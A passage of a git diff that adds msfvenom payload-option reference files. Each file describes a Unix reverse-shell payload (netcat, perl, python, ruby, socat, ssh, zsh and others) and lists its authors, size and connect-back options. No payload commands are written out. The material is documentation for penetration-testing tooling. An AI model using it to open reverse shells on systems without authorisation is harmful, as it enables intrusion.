CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + NetcatPath nc yes The path to the Netcat executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + ShellPath /bin/sh yes The path to the shell to execute + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_netcat_gaping.txt b/msfvenom/payload_options/cmd-unix-reverse_netcat_gaping.txt new file mode 100644 index 0000000..2255d37 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_netcat_gaping.txt @@ -0,0 +1,40 @@ + + Name: Unix Command Shell, Reverse TCP (via netcat -e) + Module: payload/cmd/unix/reverse_netcat_gaping + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 19 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via netcat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + NetcatPath nc yes The path to the Netcat executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + ShellPath /bin/sh yes The path to the shell to execute + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_nodejs.txt b/msfvenom/payload_options/cmd-unix-reverse_nodejs.txt new file mode 100644 index 0000000..3cde583 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_nodejs.txt @@ -0,0 +1,38 @@ + + Name: Unix Command Shell, Reverse TCP (via nodejs) + Module: payload/cmd/unix/reverse_nodejs + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 3171 + Rank: Normal + +Provided by: + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Continually listen for a connection and spawn a command shell via nodejs + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_openssl.txt b/msfvenom/payload_options/cmd-unix-reverse_openssl.txt new file mode 100644 index 0000000..8a34aff --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_openssl.txt @@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Double Reverse TCP SSL (openssl) + Module: payload/cmd/unix/reverse_openssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 152 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell through two inbound connections + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + OpenSSLPath openssl yes The path to the OpenSSL executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + ShellPath sh yes The path to the shell to execute + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_perl.txt b/msfvenom/payload_options/cmd-unix-reverse_perl.txt new file mode 100644 index 0000000..f2fee82 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_perl.txt @@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Reverse TCP (via Perl) + Module: payload/cmd/unix/reverse_perl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 219 + Rank: Normal + +Provided by: + cazz + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via perl + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PerlPath perl yes The path to the Perl executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_perl_ssl.txt b/msfvenom/payload_options/cmd-unix-reverse_perl_ssl.txt new file mode 100644 index 0000000..8b8b5e2 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_perl_ssl.txt @@ -0,0 +1,41 @@ + + Name: Unix Command Shell, Reverse TCP SSL (via perl) + Module: payload/cmd/unix/reverse_perl_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 158 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via perl, uses SSL + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PerlPath perl yes The path to the Perl executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_php_ssl.txt b/msfvenom/payload_options/cmd-unix-reverse_php_ssl.txt new file mode 100644 index 0000000..9f5da1c --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_php_ssl.txt @@ -0,0 +1,41 @@ + + Name: Unix Command Shell, Reverse TCP SSL (via php) + Module: payload/cmd/unix/reverse_php_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 264 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via php, uses SSL + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PHPPath php yes The path to the PHP executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_python.txt b/msfvenom/payload_options/cmd-unix-reverse_python.txt new file mode 100644 index 0000000..217b988 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_python.txt @@ -0,0 +1,40 @@ + + Name: Unix Command Shell, Reverse TCP (via Python) + Module: payload/cmd/unix/reverse_python + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 348 + Rank: Normal + +Provided by: + bcoles + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The system shell to use + +Description: + Connect back and create a command shell via Python + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PythonPath python yes The path to the Python executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_python_ssl.txt b/msfvenom/payload_options/cmd-unix-reverse_python_ssl.txt new file mode 100644 index 0000000..4da0830 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_python_ssl.txt @@ -0,0 +1,41 @@ + + Name: Unix Command Shell, Reverse TCP SSL (via python) + Module: payload/cmd/unix/reverse_python_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 464 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via python, uses SSL, encodes with base64 by design. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PythonPath python yes The path to the Python executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_r.txt b/msfvenom/payload_options/cmd-unix-reverse_r.txt new file mode 100644 index 0000000..36433d6 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_r.txt @@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Reverse TCP (via R) + Module: payload/cmd/unix/reverse_r + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 142 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back and create a command shell via R + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + RPath R yes The path to the R executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_ruby.txt b/msfvenom/payload_options/cmd-unix-reverse_ruby.txt new file mode 100644 index 0000000..461dfb3 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_ruby.txt @@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Reverse TCP (via Ruby) + Module: payload/cmd/unix/reverse_ruby + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 118 + Rank: Normal + +Provided by: + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back and create a command shell via Ruby + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + RubyPath ruby yes The path to the Ruby executable + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_ruby_ssl.txt b/msfvenom/payload_options/cmd-unix-reverse_ruby_ssl.txt new file mode 100644 index 0000000..35bc738 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_ruby_ssl.txt @@ -0,0 +1,41 @@ + + Name: Unix Command Shell, Reverse TCP SSL (via Ruby) + Module: payload/cmd/unix/reverse_ruby_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 170 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back and create a command shell via Ruby, uses SSL + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + RubyPath ruby yes The path to the Ruby executable + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_socat_sctp.txt b/msfvenom/payload_options/cmd-unix-reverse_socat_sctp.txt new file mode 100644 index 0000000..39a2429 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_socat_sctp.txt @@ -0,0 +1,38 @@ + + Name: Unix Command Shell, Reverse SCTP (via socat) + Module: payload/cmd/unix/reverse_socat_sctp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 73 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via socat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_socat_tcp.txt b/msfvenom/payload_options/cmd-unix-reverse_socat_tcp.txt new file mode 100644 index 0000000..cfaab9e --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_socat_tcp.txt @@ -0,0 +1,38 @@ + + Name: Unix Command Shell, Reverse TCP (via socat) + Module: payload/cmd/unix/reverse_socat_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 59 + Rank: Normal + +Provided by: + jheysel-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via socat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_socat_udp.txt b/msfvenom/payload_options/cmd-unix-reverse_socat_udp.txt new file mode 100644 index 0000000..4758e1f --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_socat_udp.txt @@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Reverse UDP (via socat) + Module: payload/cmd/unix/reverse_socat_udp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 72 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via socat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + BashPath bash yes The path to the Bash executable + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SocatPath socat yes The path to the Socat executable + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_ssh.txt b/msfvenom/payload_options/cmd-unix-reverse_ssh.txt new file mode 100644 index 0000000..53c0e57 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_ssh.txt @@ -0,0 +1,38 @@ + + Name: Unix Command Shell, Reverse TCP SSH + Module: payload/cmd/unix/reverse_ssh + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 146 + Rank: Normal + +Provided by: + RageLtMan + hirura + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 22 yes The listen port + +Description: + Connect back and create a command shell via SSH + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + SSHPath ssh yes The path to the SSH executable + ShellPath /bin/sh yes The path to the shell to execute + Ssh::Version SSH-2.0-OpenSSH_5.3p1 yes The SSH version string to provide + SshClientOptions UserKnownHostsFile=/dev/null StrictHostKeyChecking=no no Space separated options for the ssh client + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_ssl_double_telnet.txt b/msfvenom/payload_options/cmd-unix-reverse_ssl_double_telnet.txt new file mode 100644 index 0000000..e615038 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_ssl_double_telnet.txt @@ -0,0 +1,40 @@ + + Name: Unix Command Shell, Double Reverse TCP SSL (telnet) + Module: payload/cmd/unix/reverse_ssl_double_telnet + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 106 + Rank: Normal + +Provided by: + hdm + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + ShellPath sh yes The path to the shell to execute + TelnetPath telnet yes The path to the telnet executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_stub.txt b/msfvenom/payload_options/cmd-unix-reverse_stub.txt new file mode 100644 index 0000000..2c82819 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_stub.txt @@ -0,0 +1,38 @@ + + Name: Unix Command Shell, Reverse TCP (stub) + Module: payload/cmd/unix/reverse_stub + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell through an inbound connection (stub only, no payload) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_tclsh.txt b/msfvenom/payload_options/cmd-unix-reverse_tclsh.txt new file mode 100644 index 0000000..cc5e7d4 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_tclsh.txt @@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Reverse TCP (via Tclsh) + Module: payload/cmd/unix/reverse_tclsh + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 169 + Rank: Normal + +Provided by: + bcoles + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via Tclsh + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + TCLSHPath tclsh yes The path to the TCLSH executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_zsh.txt b/msfvenom/payload_options/cmd-unix-reverse_zsh.txt new file mode 100644 index 0000000..ef6edef --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_zsh.txt @@ -0,0 +1,41 @@ + + Name: Unix Command Shell, Reverse TCP (via Zsh) + Module: payload/cmd/unix/reverse_zsh + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 79 + Rank: Normal + +Provided by: + Doug Prostko + Wang Yihang + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back and create a command shell via Zsh. Note: Although Zsh is often + available, please be aware it isn't usually installed by default. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + 